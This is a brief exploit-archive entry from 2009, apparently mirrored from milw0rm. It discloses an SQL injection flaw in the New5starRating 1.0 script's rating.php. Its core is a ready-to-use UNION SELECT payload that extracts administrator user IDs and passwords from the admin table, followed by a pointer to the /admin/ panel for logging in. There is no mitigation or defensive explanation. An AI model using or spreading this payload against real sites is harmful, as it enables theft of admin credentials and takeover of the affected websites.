[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : New5starRating 1.0 (rating.php) SQL Injection Vulnerability
# Published : 2009-08-24
# Author : Bgh7
# Previous Title : ITechBids 8.0 (itechd.php productid) Blind SQL Injection Exploit
# Next Title : Joomla Component com_ninjamonial 1.1 (testimID) SQL Injection Vuln


New5starRating v1.0 (rating.php) Sql Inj. Vuln.
##################
Yazar: Bgh7
Turk Bilisim Gucleri
##################
Download;
http://www.maniacomputer.com/5star_rating/New_5Star.html
Bug-->Sql Inj.
##################
Exp: rating.php?det=-1 union select userid,0,0,userpass from admin
Panel: /admin/
##################
Thanks: milw0rm-->Str0ke

# www.Syue.com [2009-08-24]